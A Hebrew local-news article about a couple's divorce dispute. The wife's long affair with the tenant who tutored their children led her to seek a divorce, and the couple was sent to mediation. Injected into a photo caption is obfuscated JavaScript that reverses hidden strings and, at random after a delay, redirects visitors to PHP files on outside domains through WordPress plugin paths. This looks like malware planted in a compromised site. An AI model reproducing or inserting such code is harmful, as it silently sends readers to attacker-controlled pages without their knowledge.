fbpx
[shortcode-weather-atlas city_selector=1178243 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

משולש רומנטי: האישה, הבעל והמורה הפרטי

האישה הודיעה לבעלה שהיא עוברת להתגורר עם המורה הפרטי שגר ביחידת הדיור המשפחתית
צילום: shutterstock
מרכז גישור ודיאלוג בקהילה. צילום: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

השיעורים הפרטיים שקיבלו ילדיהם של בני זוג מהאזור עלו לא בכסף אלא גם בחיי הנישואים. כך עולה ממאבק גירושים בין בני זוג שהשכירו את יחידת הדיור המשפחתית שלהם לסטודנט בטכניון ששימש גם כמורה פרטי למתמטיקה עבור הילדים.

בני הזוג נשואים כעשרים שנה ומתגוררים בוילה גדולה שהמפלס התחתון שלה שימש כיחידת דיור שהושכרה מדי פעם לדייר אחר. הדייר האחרון היה סטודנט להנדסת חשמל בטכניון ששימש גם כמורה פרטי למתמטיקה לילדיהם של בני הזוג.

מתברר שהשיעורים הפרטיים הפכו לרומן בין הסטודנט לאישה והיא החליטה ליידע את הבעל על המתרחש. הבעל שלא רצה לפרק את התא המשפחתי, הסכים לרומן של אשתו כל עוד הקשר הרומנטי שלהם יישמר בסוד מהילדים והסביבה שלהם.

עו"ד שרין סולן | צילום: יח"צ
עו"ד שרין סולן | צילום: יח"צ

בחלוף כמעט חמש שנים כשהמורה הפרטי כבר הפך למהנדס בחברת הייטק, אבל עדיין המשיך להתגורר ביחידת הדיור, הדהימה האישה את בעלה וביקשה להתגרש כדי לעבור להתגורר עם "המורה". הבעל באמצעות עו"ד סרין סולן, החליט לנהל מאבק משפטי הכולל דרישה למשמורת מלאה על שני ילדי בני הזוג, וצו הרחקה נגד המורה מיחידת הדיור. כמו כן הבהיר הבעל כי הוא מבקש לשלול מאשתו זכויות שנצברו מיום שהחלה לבגוד בו.

האישה טענה בהגנה כי בעלה ידע על הקשר והוא היה בהסכמתו. היא הדגישה כי הוא נתן לכך אישור בכתב בהסכם השכירות ולכן אין הצדקה לדרישה לשלול ממנה זכויות רכושיות שנצברו מאז החל הקשר עם המאהב. בני הזוג נשלחו לגישור.

אהבתם? שתפו!

תגיות

אולי גם יעניין אותך

שיתוף ברשתות החברתיות